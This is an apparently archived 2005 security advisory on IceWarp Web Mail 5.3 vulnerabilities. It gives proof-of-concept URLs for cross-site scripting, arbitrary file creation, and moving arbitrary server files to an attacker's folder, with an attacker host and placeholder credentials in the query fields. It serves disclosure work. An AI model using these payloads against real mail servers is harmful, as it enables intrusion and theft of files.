exploits , vulnerabilities , articles , IceWarp Web Mail Multiple Remote Vulnerabilities

Title	IceWarp Web Mail Multiple Remote Vulnerabilities
Published	2005-01-28-12:00AM
Updated	2005-02-03-05:03PM
Class	Access Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	ShineShadow <ss_contacts@hotmail.com> is credited with the disclosure of these issues.
Vulnerable	IceWarp Web Mail 5.3
Not Vulnerable	IceWarp Web Mail 5.4 IceWarp Web Mail 5.3.2 IceWarp Web Mail 5.3.1
Code	No exploits are required to leverage these issues. The following proof of concepts have been provided: To carry out cross-site scripting attacks: http://www.example.com:32000/mail/login.html?username=[xss_here] http://www.example.com/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here] To create a file with arbitrary contents on an affected computer: http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accontid=[arbitary_text] To move an arbitrary file to an attacker's folder: http://localhost:32000/importaction.html?id=[sessionid]&importfile=[arbitrary_path]&action=upload&Import=1&importfile_size=1000000
TXT